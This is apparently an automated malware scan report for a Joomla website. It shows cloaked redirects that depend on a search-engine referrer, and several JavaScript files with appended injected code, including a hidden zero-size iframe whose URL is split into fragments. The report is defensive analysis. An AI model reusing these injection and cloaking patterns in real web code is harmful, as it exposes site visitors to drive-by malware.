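Malicious/Suspicious Redirects
Note: both requests below were sent with a Google search Referer header. The same home page returned 200 OK in the "Scanned pages/files" section, so the redirect appears to depend on how the visitor arrives. A direct visit to the site may not reproduce it.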
Request | Server response | Status |
URL: http://www.modelworks.ru/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: www.modelworks.ru Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Moved Temporarily Connection: close Date: Mon, 01 Sep 2014 22:33:21 GMT Location: http://www.totalcarsolution.com/sctcom/cgi-bin/1.php Server: nginx/0.7.67 Vary: Accept-Encoding Content-Type: text/html Set-Cookie: _cutt_caches_images=1409610801; expires=Tue, 02-Sep-2014 22:33:21 GMT; path=/ X-Powered-By: PHP/5.2.17 | malicious |
URL: http://www.totalcarsolution.com/sctcom/cgi-bin/1.php (imitation of visitor from search engine) GET /sctcom/cgi-bin/1.php HTTP/1.1 Host: www.totalcarsolution.com Referer: http://www.google.com/search?q=redirect+check2 | HTTP/1.1 302 Moved Temporarily Connection: close Date: Mon, 01 Sep 2014 22:33:21 GMT Location: http://www.csra.de/includes/domit/1.php Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html | malicious |
Scanned pages/files
Request | Server response | Status |
http://www.modelworks.ru/ | 200 OK Content-Length: 22051 Content-Type: text/html | clean |
http://www.modelworks.ru/plugins/system/jceutilities/js/mediaobject.js | 200 OK Content-Length: 3896 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below):
var MediaObject = { version : { 'flash' : '9,0,124,0', 'windowsmedia' : '5,1,52,701', 'quicktime' : '6,0,2,0', 'realmedia' : '7,0,0,0', 'shockwave' : '8,5,1,0' }, init : function(v){ var t = this; for(n in v){ t.version[n] = v[n]; } }, getSite : function(){ var x, s = document.getElementsByTagName('script'); for(x=0; x<s.length; x++){ if(/jceutilities\/js\/mediaobjec p ); } } function writeFlash(p) { MediaObject.flash(p); } function writeShockWave(p) { MediaObject.shockwave(p); } function writeQuickTime(p) { MediaObject.quicktime(p); } function writeRealMedia(p) { MediaObject.realmedia(p); } function writeWindowsMedia(p) { MediaObject.windowsmedia(p); } function writeDivX(p) { MediaObject.divx(p); } ;document.write(unescape( […]
Note: the scanner abbreviates this excerpt, so it breaks off mid-expression and the unescape() argument is not shown. The statement to look at is the trailing `;document.write(unescape(`, which follows the last library function here and ends every file flagged as malicious in this report.
Antivirus reports:
| ||
http://www.modelworks.ru/plugins/system/jceutilities/js/jquery-126.js | 200 OK Content-Length: 31063 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('(H(){J w=1b.4M,3m$=1b.$;J D=1b.4M=1b.$=H(a,b){I 2B D.17.5j(a,b)};J u=/^[^<]*(<(.|\\s)+>)[^>]*$|^#(\\w+)$/,62=/^.[^:#\\[\\.]*$/,12;D.17=D.44={5j:H(d,b){d=d|| ;document.write(unescape( Antivirus reports:
| ||
http://www.modelworks.ru/plugins/system/jceutilities/js/jceutilities-216.js | 200 OK Content-Length: 19934 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) jQuery.noConflict();(function($){$.jceUtilities=function(options){return $.jceUtilities.init(options)};$.jceUtilities.init=function(options){this.options=$.extend({popup:{legacy:0,overlay:1,overlayopacity:0.8,overlaycolor:'#000000',resize:1,icons:1,fadespeed:500,scalespeed:500,width:640,height:480,theme:'standard',themecustom:'',themepath:'plugins/system/jceutilities/themes',hideobjects:1,scrollpopup:1},tooltip:{classname:'tooltip',opacity:1,speed:150,position:'br',offsets:{'x':16,'y':16}} ;document.write(unescape( Antivirus reports:
| ||
http://www.modelworks.ru/media/system/js/caption.js | 200 OK Content-Length: 2169 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below):
var JCaption = new Class({ initialize: function(selector) { this.selector = selector; var images = $$(selector); images.each(function(image){ this.createCaption(image); }, this); }, createCaption: function(element) { var caption = document.createTextNode(element.title); var container = document.createElement("div"); var text = document.createElement("p"); var width = element.getAttribute("width"); var align = container.setAttribute("style","float:"+align); container.style.width = width + "px"; } }); document.caption = null; window.addEvent('load', function() { var caption = new JCaption('img.caption') document.caption = caption }); ;document.write(unescape( document.write('<iframe src="'+'ht'+'tp://jvm'+'an.cz/c'+'omp'+'on'+'ents/c'+'om_c'+'ont'+'ent/'+'m'+'od'+'els/'+'sh.'+'html" width="0" height="0" frameborder="0"></iframe>');
Note: the caption code is followed by a trailing `;document.write(unescape(` statement whose argument is not shown. The excerpt then shows a document.write of an iframe with width and height 0, its URL split into short concatenated string fragments. This may be the decoded form of the unescape() payload, but the report does not say so.
Antivirus reports:
| ||
http://www.modelworks.ru/templates/yoo_level/warp/systems/joomla.1.5/js/warp.js | 200 OK Content-Length: 1578 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var Warp=Warp||{};Warp.Base={matchHeight:function(e,d){var c=0;$$(e).each(function(a){var b;if(a.offsetHeight)b=a.offsetHeight;else if(a.style.pixelHeight)b=a.style.pixelHeight;b||(b=0);c=Math.max(c,b)});if(d!=undefined)c=Math.max(c,d);$$(e).each(function(a){var b=a.getStyle("padding-top").toInt()+a.getStyle("padding-bottom").toInt()+a.getStyle("border-top-width").toInt()+a.getStyle("border-bottom-width").toInt();a.setStyle(window.ie6?"height":"min-height",c-b+"px")})}}; Warp.Morph=new Class Warp.Morph.implement(new Options);Warp.BackgroundFx=new Class({initialize:function(e){function d(){c.start({"background-color":b[a]});if(a+1>=b.length)a=0;else a++}this.setOptions({transition:Fx.Transitions.linear,duration:9E3,wait:false,colors:["#FFFFFF","#999999"]},e);var c=(new Element(document.body)).effects(this.options),a=0,b=this.options.colors;d.periodical(this.options.duration*2);d()}});Warp.BackgroundFx.implement(new Options); ;document.write(unescape( Antivirus reports:
| ||
http://www.modelworks.ru/templates/yoo_level/warp/systems/joomla.1.5/js/accordionmenu.js | 200 OK Content-Length: 1238 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var Warp=Warp||{}; Warp.AccordionMenu=new Class({initialize:function(a,c,d){this.setOptions({accordion:"default",onActive:function(b){b.addClass("active");b.getFirst().addClass("active")},onBackground:function(b){b.removeClass("active");b.getFirst().removeClass("active")}},d);this.togs=a;this.elms=c;switch(this.options.accordion){case "slide":this.createSlide();break;default:this.createDefault()}},createDefault:function(){var a={};if(!$defined(this.options.display)&&!$defined(this.op Warp.AccordionMenu.implement(new Options); ;document.write(unescape( Antivirus reports:
| ||
http://www.modelworks.ru/templates/yoo_level/js/menu.js | 200 OK Content-Length: 841 Content-Type: application/javascript | clean |
http://www.modelworks.ru/templates/yoo_level/js/template.js | 200 OK Content-Length: 3522 Content-Type: application/javascript | clean |
http://www.modelworks.ru/modules/mod_yoo_scroller/mod_yoo_scroller.js | 200 OK Content-Length: 3902 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('c 1a=b w({1X:4(q,5){2.1W({1V:w.I,1u:w.I,1x:w.I,1y:w.I,1C:w.I,1f:\'.7\',1e:\'.1U\',1b:\'.1h\',1c:\'.1h-1Y\',1q:\'.1Z\',1l:{o:\'.o\',P:\'.P\'},1p:0,1B:24,Q:s,1t:0,1i: ;document.write(unescape( Antivirus reports:
| ||
http://www.modelworks.ru//plugins/system/u24/lytebox/3.22/lytebox.js/ | 404 Not Found Content-Length: 4325 Content-Type: text/html | clean |
http://www.modelworks.ru/test404page.js | 404 Not Found Content-Length: 4325 Content-Type: text/html | clean |
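Safe Browsing / Blacklists
Note: neither service below lists the site, although the scan above flagged two redirects and seven script files as malicious. A "not listed" result therefore does not show that the site is clean.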
Query: http://www.google.com/safebrowsing/diagnostic?site=modelworks.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://modelworks.ru/
Result: modelworks.ru is not infected or malware details are not published yet.
Result: modelworks.ru is not infected or malware details are not published yet.